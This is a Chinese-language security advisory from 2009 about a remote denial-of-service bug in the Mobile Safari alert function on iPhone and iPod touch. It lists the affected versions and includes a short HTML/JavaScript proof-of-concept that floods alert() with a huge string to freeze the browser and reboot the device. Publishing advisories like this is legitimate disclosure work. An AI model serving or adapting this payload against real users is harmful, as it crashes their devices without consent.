Apple iPhone/iPod touch Mobile Safari Alert远程拒绝服务漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-09-05
Apple iPhone/iPod touch Mobile Safari Alert远程拒绝服务漏洞 影响版本:
Apple iPod Touch 2.2.1
Apple iPod Touch 2.0.2
Apple iPod Touch 2.0.1
Apple iPod Touch 1.1.4
Apple iPod Touch 1.1.3
Apple iPod Touch 1.1.2
Apple iPod Touch 1.1.1
Apple iPod Touch 3.0
Apple iPod Touch 2.2
Apple iPod Touch 2.1
Apple iPod Touch 2.0
Apple iPod Touch 1.1
Apple iPhone 3.0.1
Apple iPhone 2.2.1
Apple iPhone 2.0.2
Apple iPhone 2.0.1
Apple iPhone 1.1.4
Apple iPhone 1.1.3
Apple iPhone 1.1.2
Apple iPhone 1.1.1
Apple iPhone 1.0.2
Apple iPhone 1.0.1
Apple iPhone 3.0
Apple iPhone 2.2
Apple iPhone 2.1
Apple iPhone 2.0
Apple iPhone 1.1
Apple iPhone 1漏洞描述:
Bugraq ID: 36195

iPod touch是苹果公司发布的MP4播放器,iPhone是其发布的智能手机
Apple iPhone/iPod touch包含的Safari浏览器处理Alert函数存在问题,安全者可以构建恶意WEB页,诱使用户打开,使应用程序崩溃。<*参考 
http://www.securityfocus.com/bid/36195/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!# Apple iPhone (MobileSafari) Crash &amp; Reboot
# TheLeader, GSOG [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il nullbyte.org.il
# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.
# Exploit:
&lt;html&gt;
&lt;body&gt;
&lt;script&gt;
var a = &#039;&#039;;
for (var i = 1; i &lt;= 500000; i++)
{
  a += &#039;/n&#039;;
}
alert(a);
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;SEBUG安全建议:
厂商解决方案

目前没有详细解决方案提供:
http://www.apple.com/iphone/
http://www.apple.com/ipodtouch/